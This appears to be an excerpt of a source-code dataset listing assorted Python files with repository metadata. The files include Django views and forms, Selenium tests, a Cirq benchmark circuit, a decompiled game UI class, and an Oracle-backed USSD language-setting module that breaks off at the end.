blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
433f3314a9d65a9f44d48aa7d4b8aba6fd80160b | 1b3addbc9473b6ffb999665601470ccc4d1153b0 | /libs/ftp/libsys.py | f9b9e5b808e87302971d10d09443fb005dc9ec07 | [] | no_license | weijia/approot | e1f712fa92c4c3200210eb95d251d890295769ba | 15fac5b31a4d619d1bdede3d1131f5e6e57cd43b | refs/heads/master | 2020-04-15T13:15:01.956721 | 2014-08-26T14:02:17 | 2014-08-26T14:02:17 | 11,049,975 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | import sys
import os
def get_root_dir(start=None):
    """Locate the project root directory.

    Walks upward from *start* (default: the current working directory)
    while the path still contains the substring ``'approot'``, then
    re-appends the ``approot`` component. Called from anywhere inside
    the checkout this yields ``<...>/approot``; called from outside it
    simply returns ``<start>/approot``.

    :param start: directory to begin from; defaults to ``os.getcwd()``.
    :return: absolute path ending in ``approot``.
    """
    c = os.getcwd() if start is None else start
    # Substring match (not a path-component match), matching the original
    # `find(...) != -1` semantics.
    while 'approot' in c:
        c = os.path.dirname(c)
    return os.path.join(c, 'approot')
# Import-time side effect: put the project root and its libs/ directory at
# the front of the module search path so intra-project imports resolve.
sys.path.insert(0, get_root_dir())
sys.path.insert(0, os.path.join(get_root_dir(),"libs"))
| [
"[email protected]"
] | |
8b5457e5029cac7eebac336935b708c07f950ef5 | 133e8c9df1d1725d7d34ea4317ae3a15e26e6c66 | /django_serializers/h.py | 7a27a611ff483b5653afffc17ef48522b67904d2 | [
"Apache-2.0"
] | permissive | 425776024/Learn | dfa8b53233f019b77b7537cc340fce2a81ff4c3b | 3990e75b469225ba7b430539ef9a16abe89eb863 | refs/heads/master | 2022-12-01T06:46:49.674609 | 2020-06-01T08:17:08 | 2020-06-01T08:17:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,693 | py | import uuid
import time
import hashlib
def get_hashID(username, hashMode=64, tablePiece=4):
    """Map *username* onto a shard (table/database) index.

    The username's hash is folded into ``hashMode`` buckets, and buckets
    are grouped ``tablePiece`` at a time; the group number is the shard
    the record lives in. E.g. with the defaults, buckets 0-3 map to
    shard 0, buckets 4-7 to shard 1, and so on.
    """
    bucket = hash(username) % hashMode
    return int(bucket / tablePiece)
# # 16进制 -- 900150983cd24fb0d6963f7d28e17f72
# hash_str = hashlib.md5(username.lower().encode(encoding='UTF-8')).hexdigest()
# userId = int(hash_str, 16) # 16进制 --> 10进制
# # print(hash_str, hash_str[:2], hash_str[-2:], num)
# # 按hashCount个为一组,分4个表
# hashID = int(hash(username) % hashMode / tablePiece)
# # hashID = num % hashNum
# # print('HashID:', hashID)
# return hashI
def get_sharding_model(username):
    """Pick the model/table number (1 or 2) backing *username*'s shard.

    The username hashes into one of two buckets; bucket 0 maps to model 1
    and bucket 1 to model 2 (any other bucket yields None, mirroring the
    original if/elif fall-through).
    """
    bucket = get_hashID(username, hashMode=2, tablePiece=1)
    return {0: 1, 1: 2}.get(bucket)
# 4124bc0a9335c27f086f24ba207a4912 41 12 16658
# HashID: 0
# 4124bc0a9335c27f086f24ba207a4912 41 12 16658
# HashID: 0
# Ad-hoc smoke test: assign 65 random usernames to shards, printing each result.
H = []
count = 0
while count <= 64:
    username = str(uuid.uuid4())
    # username = str(count)
    # hashID = get_hashID(username)
    print(get_sharding_model(username))
    count += 1
    # time.sleep(0.1)
    # if hashID not in H:
    #     H.append(hashID)
# NOTE(review): H is never populated above (the appends are commented out),
# so this sorts an empty list.
H.sort()
print(H) | [
"[email protected]"
] | |
9d99fa31ca382f121ca758af5f7cae8ebd6ce00d | 8226f8b4e7f5a48edac45831dc37f6243dc59e3d | /flask_cms/menu/views.py | 1236b35221215d7db3c7cc03e0ba5c30aa89dc9f | [] | no_license | fyarci/flask-cms | 9b0bb3241dccd1c887f1534319d61e898d94b9e8 | 021a0afaad5133b41a79eb3ae46307915f2bf241 | refs/heads/master | 2021-01-20T17:42:35.795521 | 2015-03-26T19:20:11 | 2015-03-26T19:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from main.baseviews import BaseView
class MenuView(BaseView):
    """Menu page view: GET and POST both render via BaseView.render()."""

    # Rendering configuration consumed by BaseView -- left empty here, so
    # the concrete template/form are presumably set elsewhere. TODO confirm.
    _template = ''
    _form = ''
    # NOTE(review): mutable class attribute -- shared by all MenuView
    # instances if anything mutates it in place; confirm that is intended.
    _context = {}

    def get(self):
        # GET and POST are handled identically.
        return self.render()

    def post(self):
        return self.render()
| [
"[email protected]"
] | |
f983bdd13adbda21ac3ba7444500ac051e15bc3f | fdf3aff5344271ef69ac7441c5dbca9cbf832cd1 | /car_location/core/forms.py | 9f5a07e19107cadb97f074332ea60379642f76e2 | [] | no_license | lffsantos/DesafioPython | 6069b3277780326611e34ae024f7506f3d56c5b4 | fbc451b77c0310630fd95cbd23c339e194af88d1 | refs/heads/master | 2021-01-17T07:42:12.181187 | 2016-01-19T03:39:20 | 2016-01-19T03:39:20 | 49,730,610 | 0 | 0 | null | 2016-01-19T03:39:22 | 2016-01-15T16:25:30 | JavaScript | UTF-8 | Python | false | false | 237 | py | from django import forms
__author__ = 'lucas'
class LoginForm(forms.Form):
    """Username/password login form (user-facing labels are Portuguese)."""

    # "Usuário" = username; "Senha" = password.
    username = forms.CharField(label="Usuário")
    # render_value=False: the password is never echoed back into the
    # widget when the form is re-displayed after a validation error.
    password = forms.CharField(
        label='Senha',
        widget=forms.PasswordInput(render_value=False))
| [
"[email protected]"
] | |
29a7a0ab383c522c7d05694d712c48b313936f14 | 244ecfc2017a48c70b74556be8c188e7a4815848 | /res/scripts/client/gui/scaleform/daapi/view/lobby/fortifications/fortnotcommanderfirstenterwindow.py | 5ead51d983802f010b2bf42272eda8e73e3f1285 | [] | no_license | webiumsk/WOT-0.9.12 | c1e1259411ba1e6c7b02cd6408b731419d3174e5 | 5be5fd9186f335e7bae88c9761c378ff5fbf5351 | refs/heads/master | 2021-01-10T01:38:36.523788 | 2015-11-18T11:33:37 | 2015-11-18T11:33:37 | 46,414,438 | 1 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,523 | py | # 2015.11.18 11:54:02 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/fortifications/FortNotCommanderFirstEnterWindow.py
from gui.Scaleform.daapi.view.meta.FortNotCommanderFirstEnterWindowMeta import FortNotCommanderFirstEnterWindowMeta
from helpers import i18n
from gui.Scaleform.locale.FORTIFICATIONS import FORTIFICATIONS
class FortNotCommanderFirstEnterWindow(FortNotCommanderFirstEnterWindowMeta):
    """First-enter popup window for non-commander fortification members.

    Decompiled client code: the class only populates the Flash view with
    localized title/description/button strings on first display.
    """

    def __init__(self, _ = None):
        # The single positional argument is accepted but ignored --
        # presumably a window-framework calling convention; confirm.
        super(FortNotCommanderFirstEnterWindow, self).__init__()

    def _populate(self):
        # Standard populate hook: defer to the meta class, then push the
        # localized strings into the Flash side.
        super(FortNotCommanderFirstEnterWindow, self)._populate()
        self.__makeData()

    def onWindowClose(self):
        self.destroy()

    def _dispose(self):
        super(FortNotCommanderFirstEnterWindow, self)._dispose()

    def __makeData(self):
        # Resolve each localization key and hand the strings to the
        # as_set* Flash setters exposed by the generated meta class.
        ms = i18n.makeString
        self.as_setWindowTitleS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_WINDOWTITLE))
        self.as_setTitleS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_TEXTTITLE))
        self.as_setTextS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_TEXTDESCRIPTION))
        self.as_setButtonLblS(ms(FORTIFICATIONS.FORTNOTCOMMANDERFIRSTENTERWINDOW_APPLYBTNLABEL))
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\scaleform\daapi\view\lobby\fortifications\fortnotcommanderfirstenterwindow.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.18 11:54:02 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
3e67815d8a4977a7b291405c2ba3898e0d0acafb | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p3BR/R1/benchmark/startCirq161.py | 1fde711516ef000ab6e95ed5effaaab00ca227fd | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,781 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=30
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
    """Build the fixed benchmark circuit on *input_qubit* and append a
    terminal measurement of all qubits under the key 'result'.

    NOTE(review): the parameter ``n`` is accepted but never used -- the
    gate sequence below is hard-coded (auto-generated; the ``number=``
    comments are generator bookkeeping).
    """
    c = cirq.Circuit() # circuit begin

    c.append(cirq.H.on(input_qubit[0])) # number=1
    c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
    c.append(cirq.H.on(input_qubit[1])) # number=3
    c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=4
    c.append(cirq.Y.on(input_qubit[1])) # number=15
    c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
    c.append(cirq.H.on(input_qubit[1])) # number=19
    c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
    c.append(cirq.H.on(input_qubit[1])) # number=21
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=22
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=27
    c.append(cirq.X.on(input_qubit[1])) # number=28
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=29
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=24
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
    c.append(cirq.Z.on(input_qubit[1])) # number=11
    c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=12
    c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=26
    c.append(cirq.Y.on(input_qubit[1])) # number=14
    c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
    c.append(cirq.X.on(input_qubit[1])) # number=6
    c.append(cirq.Z.on(input_qubit[1])) # number=8
    c.append(cirq.X.on(input_qubit[1])) # number=7
    c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
    # circuit end

    c.append(cirq.measure(*input_qubit, key='result'))
    return c
def bitstring(bits):
    """Render an iterable of bit-like values as a string of digits."""
    digits = [str(int(bit)) for bit in bits]
    return ''.join(digits)
if __name__ == '__main__':
    # Build the 4-qubit benchmark circuit, optimize it for the Sycamore
    # sqrt-iswap gate set, simulate it, and dump the measurement histogram
    # plus the circuit itself to a CSV alongside the data directory.
    qubit_count = 4
    input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
    circuit = make_circuit(qubit_count,input_qubits)
    circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')

    circuit_sample_count =2000
    simulator = cirq.Simulator()
    result = simulator.run(circuit, repetitions=circuit_sample_count)

    # Histogram keys are the measured bitstrings (via bitstring() above).
    frequencies = result.histogram(key='result', fold_func=bitstring)
    writefile = open("../data/startCirq161.csv","w+")
    print(format(frequencies),file=writefile)
    print("results end", file=writefile)

    # Number of moments in the optimized circuit, then its text diagram.
    print(circuit.__len__(), file=writefile)
    print(circuit,file=writefile)

    writefile.close()
"[email protected]"
] | |
8da6a2c1fcd0624bf6f4f95e7bdcfca5e648caf2 | 8015f1c62a2cb4efd21aa8938336913bf8117868 | /bamap/ba2346.pngMap.py | 25e5f73bcbb72562c6901b1d74964d3487edc4cb | [] | no_license | GamerNoTitle/Beepers-and-OLED | 675b5e3c179df0f0e27b42bf594c43860d03b9af | afe1340e5394ae96bda5f9022a8a66824368091e | refs/heads/master | 2020-04-20T00:09:47.122471 | 2019-04-29T04:59:35 | 2019-04-29T04:59:35 | 168,515,579 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,468 | py | ba2346.pngMap = [
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000011001000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000011000100000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000110000100000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000111110000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000111111111000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000111111111100000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000111011111111111111110000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000101111111111111111111000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000001111111111111111111111100000000000000000000000000000000000000000000000000000000000001111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000011111111111111111111000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000001011111111111111111111100000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000111111111111111111111000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000001011111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000011111111111010000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000001111111000000000000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000000000000001111111000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000111111111110111000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000011111111111111111111100000000000000000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000001111111111111111111000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000101111111111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000000000000000010111111111111',
'00000000000000000000000000000000000000111111111111111111111100000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000001111111111111111111111100000000000000000000000000000000000000000000000000000011111111111110',
'00000000000000000000000000000000000001111111111111111111110000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000011111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000011111111111111111111111100000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000111111111111111111111111111100000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000111111111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000001011111100111111111111111111111000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000110011111000111111111111111111111000000000000000000000000000000000000000000000000000000011111111111111',
'11010000000000000000000011111111000000011111111111111111000000000000000000000000000000000000000000000000000000000011111111111111',
'11100000000010000000010011111111000000001111111111111100000000000000000000000000000000000000000000000000000000000011111111111111',
'11111111011111111111111111110000000000111111111111111100000000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111000000011111111111111111100000000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111000000000110010110000000000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000001111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000000000000000000000001111111111111111',
'01111111111111111111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000001111111111111111',
'00000000111111111111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000001111111111111111',
'00000000000011111111111111111111111111111111111111111111111111111111111111111111100000000000000000000000000000001111111111111111',
'00000000000001101111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000000001111111111111111',
'00000000000000000001111111111111111111111111111111111111111111111111111111111000000000000000000000000000000000001111111111111111',
'00000000000000000000000011111111111111111111111111111111111111111111111100000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000111111111111111111111111111111111111111111111100000000000000000000000000000000000000111111111111111111',
]
| [
"[email protected]"
] | |
b2d2451bc3984a1ca2f67fb4553d2e0e30f40a41 | e99dfc900052272f89d55f2fd284389de2cf6a73 | /tests/functional_tests/apostello/test_api_setup.py | 9efd0f948f616b2868247c953c4b980810b5ebe3 | [
"MIT"
] | permissive | armenzg/apostello | a3e6ca3d34917608af79fbab4134ee4de1f5e8ee | 1827547b5a8cf94bf1708bb4029c0b0e834416a9 | refs/heads/master | 2021-01-18T18:16:02.364837 | 2017-03-22T20:34:21 | 2017-03-22T20:34:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,467 | py | from time import sleep
import pytest
URI = '/api-setup/'
@pytest.mark.django_db
@pytest.mark.slow
@pytest.mark.selenium
class TestAPISetup:
    """Browser end-to-end checks of the API-token setup page.

    Exercises deleting a non-existent token, generating a token for the
    first time, regenerating it, and finally deleting it, asserting the
    presence/absence of the 'No API Token' marker after each step.
    """

    # XPaths of the two form buttons on the api-setup page; form[1] is
    # (re)generate, form[2] is delete.
    _REGENERATE_XPATH = '/html/body/div[3]/div/div[2]/form[1]/button'
    _DELETE_XPATH = '/html/body/div[3]/div/div[2]/form[2]/button'

    def _click(self, browser, xpath, wait):
        """Click the first element at *xpath*, then wait for the page to settle."""
        browser.find_elements_by_xpath(xpath)[0].click()
        sleep(wait)

    def test_api_setup(self, live_server, browser_in, users, driver_wait_time):
        """Test api-setup form."""
        no_api_token_txt = 'No API Token'
        b = browser_in
        browser_in.get(live_server + URI)
        # delete token that doesn't exist
        self._click(b, self._DELETE_XPATH, driver_wait_time)
        assert no_api_token_txt in b.page_source
        # generate token for first time
        self._click(b, self._REGENERATE_XPATH, driver_wait_time)
        assert no_api_token_txt not in b.page_source
        # regenerate token
        self._click(b, self._REGENERATE_XPATH, driver_wait_time)
        assert no_api_token_txt not in b.page_source
        # delete token
        self._click(b, self._DELETE_XPATH, driver_wait_time)
        assert no_api_token_txt in b.page_source
| [
"[email protected]"
] | |
00ae9f869fddaf6c3843afeded27511872963210 | b00e579fb29509ba390b4f8bbb0de510c0128f31 | /tests/conftest.py | 3f61372cbcdbbc7b21bb7d54016ffbd164f9a0f0 | [
"MIT"
] | permissive | TrendingTechnology/kakaowork-py | 98dbb6d4b30e0a6bd182841bc8f1a5872f131c31 | 63ac2e09a52c9427d597a0cf53eb84d205855954 | refs/heads/master | 2023-07-10T09:34:14.872810 | 2021-09-01T02:32:30 | 2021-09-01T02:32:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | import pytest
from click.testing import CliRunner
from tests import Clock
@pytest.fixture(autouse=True)
def urllib3_never_request(monkeypatch):
    """Autouse guard: remove urllib3's urlopen so any test that attempts a
    real HTTP request fails loudly instead of hitting the network."""
    monkeypatch.delattr("urllib3.connectionpool.HTTPConnectionPool.urlopen")
@pytest.fixture(scope="function")
def cli_runner():
    """Fresh Click CLI runner per test."""
    return CliRunner()
@pytest.fixture(scope="function")
def cli_runner_isolated():
    """Click CLI runner whose invocations run inside a temporary, isolated
    filesystem (cleaned up when the test ends)."""
    cli_runner = CliRunner()
    with cli_runner.isolated_filesystem():
        yield cli_runner
@pytest.fixture(scope="function")
def timer():
    """Per-test Clock instance (imported from the tests package)."""
    return Clock()
| [
"[email protected]"
] | |
1d6637bc48834ad346c0d169ca0c20a478b13c04 | a1b649fcd0b6f6c51afb13f406f53d7d823847ca | /studies/migrations/0023_remove_responselog_extra.py | 6b48f882d7d4c284ca95a32f5a59ef407e00e873 | [
"MIT"
] | permissive | enrobyn/lookit-api | e79f0f5e7a4ef8d94e55b4be05bfacaccc246282 | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | refs/heads/master | 2020-03-27T01:54:00.844971 | 2018-08-08T15:33:25 | 2018-08-08T15:33:25 | 145,752,095 | 0 | 0 | MIT | 2018-08-22T19:14:05 | 2018-08-22T19:14:04 | null | UTF-8 | Python | false | false | 397 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-16 23:26
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration: drop the ``extra`` field from the
    ``responselog`` model."""

    dependencies = [
        ('studies', '0022_auto_20170815_2241'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='responselog',
            name='extra',
        ),
    ]
| [
"[email protected]"
] | |
f9c21e4c3a6dd3739b07b83be710729b6b449345 | fd54c0886b81b49a55c31eb8c5254ce83df78785 | /Source_Code/madagascar/appussd/ussd/services/common/language/core.py | ca4a04aa9d72f124a4496aeece13ee96e74e9d44 | [] | no_license | santsy03/RADIX | 7854896651833b1be6e3279be409db59a71c76e4 | da8f2535692697b80a6dc543b9eb270fe3d5e4d3 | refs/heads/master | 2021-01-12T09:48:32.085432 | 2016-12-13T06:01:41 | 2016-12-13T06:01:41 | 76,260,115 | 0 | 0 | null | 2016-12-13T06:01:41 | 2016-12-12T13:46:31 | null | UTF-8 | Python | false | false | 4,765 | py | #!/usr/bin/env python
import cx_Oracle
import traceback
from datetime import datetime
from DBUtils.PooledDB import PooledDB
from ussd.configs.core import databases
from ussd.services.common.secure.secure import decrypt
from ussd.metrics.sendmetric import sendMetric
from ussd.metrics.config import dbTimeTemplate
from ussd.metrics.config import dbTemplate
def db_setup():
    """Build a pooled connection to the 'core' Oracle database and return
    one connection from it.

    Credentials are stored encrypted in the config and decrypted here.

    NOTE(review): a brand-new PooledDB pool is constructed on every call,
    so the pool's caching (maxcached=5) never amortizes anything across
    calls -- confirm whether a single module-level pool was intended.
    """
    db = databases['core']
    pooled = PooledDB(cx_Oracle, maxcached = 5, maxconnections=100,\
        user = decrypt(db['username']), password = decrypt(db['password'])\
        ,dsn = db['string'], threaded = True)
    # Idle pooled connections time out after 300 seconds.
    pooled.timeout = 300
    return pooled.connection()
def getLanguage(resources):
    '''Retrieve the stored language setting for the subscriber in
    resources['msisdn'].

    Returns the language code from new_service_language, or 'txt-2'
    (presumably the default language key -- TODO confirm) when no row
    exists or the lookup fails. Emits timing/outcome metrics via
    sendMetric as a side effect. Python 2 code.
    '''
    # Metric bookkeeping: stamp the request for the DB-timer namespace.
    now = datetime.now()
    resources['start'] = now
    resources['type'] = 'timer'
    resources['nameSpace'] = dbTimeTemplate
    conn = db_setup()
    cursor = conn.cursor()
    try:
        msisdn = resources['msisdn']
        sql = ('select language from new_service_language where msisdn = :msisdn')
        cursor.execute(sql,{'msisdn':msisdn})
        result = cursor.fetchone()
        # rowcount is captured before closing so "no row" can be told
        # apart from "row found" on the success path below.
        count = cursor.rowcount
        cursor.close()
        conn.close()
        sendMetric(resources)
    except Exception,e:
        # NOTE(review): 'error' is built but never logged or raised --
        # only the traceback is printed. Presumably leftover logging.
        error = 'operation:getLanguage,desc: could not retrieve language settings,error=%s' %str(e)
        print traceback.format_exc()
        try:
            # Best-effort cleanup plus a failure metric; any secondary
            # error is swallowed so the caller still gets the default.
            cursor.close()
            conn.close()
            resources['type'] = 'beat'
            action = 'failure'
            nameSpace = dbTemplate.substitute(package=action)
            resources['nameSpace'] = nameSpace
            sendMetric(resources)
            return 'txt-2'
        except:
            return 'txt-2'
    else:
        # Success path: emit a success beat; metric failures must not
        # break the lookup itself.
        resources['type'] = 'beat'
        action = 'success'
        nameSpace = dbTemplate.substitute(package=action)
        resources['nameSpace'] = nameSpace
        try:
            sendMetric(resources)
        except Exception,e:
            print str(e) + ":: Error"
        if count == 0:
            # No language stored for this msisdn: fall back to 'txt-2'.
            return 'txt-2'
        else:
            return result[0]
def setLanguage(resources):
    '''Persist the language choice in resources['msg'] for the subscriber
    in resources['msisdn'] (update if a row exists, insert otherwise),
    then return the corresponding response text from config.responses.
    Emits timing/outcome metrics via sendMetric. Python 2 code.
    '''
    from config import responses
    # Metric bookkeeping: stamp the request for the DB-timer namespace.
    now = datetime.now()
    resources['start'] = now
    resources['type'] = 'timer'
    resources['nameSpace'] = dbTimeTemplate
    #cursor = ((resources['connections']).acquire()).cursor()
    conn = db_setup()
    cursor = conn.cursor()
    try:
        msisdn = resources['msisdn']
        msg = resources['msg']
        print 'Connecting to DB : setting language for msisdn :' +str(msisdn)
        # Probe for an existing row to decide between UPDATE and INSERT.
        sql = ("select language from new_service_language where msisdn = :msisdn")
        param = {'msisdn':msisdn}
        cursor.execute(sql, param).fetchall()
        if cursor.rowcount > 0:
            sql0 = ("update new_service_language set language = :language where msisdn = :msisdn")
        else:
            sql0 = ("insert into new_service_language (id, msisdn, language, modified_at)\
                values (new_service_lan.nextval, :msisdn, :language, sysdate)")
        params = {}
        params['msisdn'] = msisdn
        params['language'] = msg
        cursor.execute(sql0, params)
        cursor.connection.commit()
        cursor.close()
        conn.close()
        sendMetric(resources)
    except Exception,e:
        # NOTE(review): error text still says 'getLanguage' -- copy-paste
        # from the sibling function; confirm before relying on logs.
        error = 'operation:getLanguage,desc: could not retrieve language settings,error=%s' %str(e)
        print error
        try:
            # Best-effort cleanup plus a failure metric; secondary errors
            # are swallowed entirely.
            print 'Close DB Connection'
            cursor.close()
            conn.close()
            resources['type'] = 'beat'
            action = 'failure'
            nameSpace = dbTemplate.substitute(package=action)
            resources['nameSpace'] = nameSpace
            sendMetric(resources)
        except Exception,e:
            pass
    else:
        # Success path: emit a success beat.
        resources['type'] = 'beat'
        action = 'success'
        nameSpace = dbTemplate.substitute(package=action)
        resources['nameSpace'] = nameSpace
        sendMetric(resources)
    # NOTE(review): if the exception path ran before msg was bound (e.g.
    # resources lacks 'msg'), this raises NameError -- confirm intended.
    return responses[msg]
def processRequest(resources):
    '''Dispatch a language request on resources['operation']:
    'set' stores the language, 'get' retrieves it.

    Returns None for any other operation value, mirroring the original
    if/elif fall-through.
    '''
    handlers = {'set': setLanguage, 'get': getLanguage}
    handler = handlers.get(resources['operation'])
    if handler is not None:
        return handler(resources)
if __name__ == '__main__':
    # Manual smoke test against the live database: look up the language
    # for a hard-coded MSISDN via both entry points. Python 2 prints.
    resources = {}
    conn = db_setup()
